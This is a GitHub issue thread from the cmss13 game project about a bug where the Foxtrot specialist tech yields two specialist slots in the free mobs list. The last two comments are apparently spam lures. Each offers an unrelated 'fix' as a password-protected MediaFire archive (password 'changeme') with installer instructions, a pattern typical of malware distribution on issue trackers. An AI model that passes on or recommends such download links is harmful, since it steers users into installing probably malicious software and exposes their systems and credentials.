### ISSUE TITLE
Foxrot specialist tech gives two specialists if no one rolls the beacon in freed mobs

### ISSUE THREAD

**Issue by kiVts** [cmss13-devs/cmss13#7053]
### Testmerges

#6334 #6071 # 6824 #6820 #6808 #6977 #7025 #6039

### Round ID

irrelevant

### Description of the bug

If no one rolls the foxrot specialist, it gives two in the freed mobs

### What's the difference with what should have happened?

One spec in freed mobs

What it actually is 
![image](https://github.com/user-attachments/assets/9609b27a-9622-4a71-bd43-89b5f5a1173f)

### How do we reproduce this bug?

1.Buy spec tech
2.have no one roll it
3.You now have two specs in the free mobs tab

### Issue Bingo

- [X] Issue could be reproduced at least once
- [X] Issue happened in a recent (less than 7 days ago) round
- [X] Couldn't find an existing issue about this (https://github.com/cmss13-devs/cmss13/issues)

**Comment by kiVts** [comment]
![image](https://github.com/user-attachments/assets/5241c32f-00de-48f3-8892-c994e02ce07a)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
